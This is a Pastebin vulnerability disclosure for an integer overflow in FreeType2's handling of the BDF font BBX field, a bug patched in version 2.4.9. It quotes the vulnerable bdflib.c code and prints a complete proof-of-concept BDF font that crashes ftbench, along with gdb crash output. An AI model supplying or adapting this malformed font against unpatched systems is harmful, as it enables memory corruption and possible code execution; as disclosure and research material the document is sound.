Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- FREETYPE2 BDF font integer overflow in BBX field
- Byoungyoung Lee
- http://twitter.com/mylifeasageek
- http://exploitshop.wordpress.com
- FREETYPE2 has an integer overflow in handling BBX field. Because this overflow results in allocating much smaller size of buffer and this buffer will be filled with user-controlled buffer, it would be possible to execute the arbitrary codes. This is patched in Freetype2 2.4.9 (http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=c4cad30ed1b1f554aa41a98b0b0fdca6e579e22f).
- You can download the PoC at http://www.cc.gatech.edu/~blee303/exploit/freetype2_bdf/bbx.bdf.
- In bdflib.c ,
- /* Allocate enough space for the bitmap. */
- glyph->bpr = ( glyph->bbx.width * p->font->bpp + 7 ) >> 3;
- bitmap_size = glyph->bpr * glyph->bbx.height;
- if ( bitmap_size > 0xFFFFU )
- {
- FT_ERROR(( "_bdf_parse_glyphs: " ERRMSG4, lineno ));
- error = BDF_Err_Bbx_Too_Big;
- goto Exit;
- }
- else
- glyph->bytes = (unsigned short)bitmap_size;
- if ( FT_NEW_ARRAY( glyph->bitmap, glyph->bytes ) )
- goto Exit;
- 1. "p->font->bpp" can be set as 0x10. "glyph->bbx.width" and
- "glyph->bbx.height" are a short variable.
- 2. "glyph->bpr" will be little bit larger than a short value 3. When
- computing bitmap_size, there could be overflows while still bypasses the
- check (bitmap_size>0xFFFFU).
- 4. guess there should be the check for "glyph->bpr" as well.
- lifeasageek@ubuntu:~/ft/git/freetype2-demos/bin$ cat ./sample.bdf
- STARTFONT
- 2.1 FONT -gnu-unifont-medium-r-normal--16-160-75-75-c-80-iso10646-1
- SIZE 16 75 75 100
- FONTBOUNDINGBOX 16 16 0 -2
- STARTPROPERTIES 2
- FONT_ASCENT 14
- FONT_DESCENT 2
- ENDPROPERTIES
- CHARS 1
- STARTCHAR U+0041
- ENCODING 65
- SWIDTH 50 0
- DWIDTH 8 0
- BBX 53768 39940 0 -2
- BITMAP
- 00
- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 00
- ENDCHAR
- ENDFONT
- lifeasageek@ubuntu:~/ft/git/freetype2-demos/bin$ ./ftbench -c 1 ./sample.bdf
- Segmentation fault
- lifeasageek@ubuntu:~/ft/git/freetype2-demos/bin$ gdb -q ./ftbench Reading
- symbols from /home/lifeasageek/ft/git/freetype2-demos/bin/ftbench...(no
- debugging symbols found)...done.
- (gdb) r -c 1 ./sample.bdf
- Starting program: /home/lifeasageek/ft/git/freetype2-demos/bin/ftbench
- -c 1 ./sample.bdf
- Program received signal SIGSEGV, Segmentation fault.
- 0x080866bf in _bdf_parse_glyphs ()
- (gdb) info reg
- eax 0x810d078 135319672
- ecx 0x0 0
- edx 0xff 255
- ebx 0xff 255
- esp 0xbffff320 0xbffff320
- ebp 0xbffff398 0xbffff398
- esi 0x0 0
- edi 0x0 0
- eip 0x80866bf 0x80866bf <_bdf_parse_glyphs+2131>
- eflags 0x210202 [ IF RF ID ]
- cs 0x73 115
- ss 0x7b 123
- ds 0x7b 123
- es 0x7b 123
- fs 0x0 0
- gs 0x33 51
- (gdb) x/5i 0x080866bf
- => 0x80866bf <_bdf_parse_glyphs+2131>: movzbl (%eax),%eax
- 0x80866c2 <_bdf_parse_glyphs+2134>: mov %eax,%edx
- 0x80866c4 <_bdf_parse_glyphs+2136>: shl $0x4,%edx
- 0x80866c7 <_bdf_parse_glyphs+2139>: mov -0x20(%ebp),%eax
- 0x80866ca <_bdf_parse_glyphs+2142>: movzbl 0x80bcfc0(%eax),%eax
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement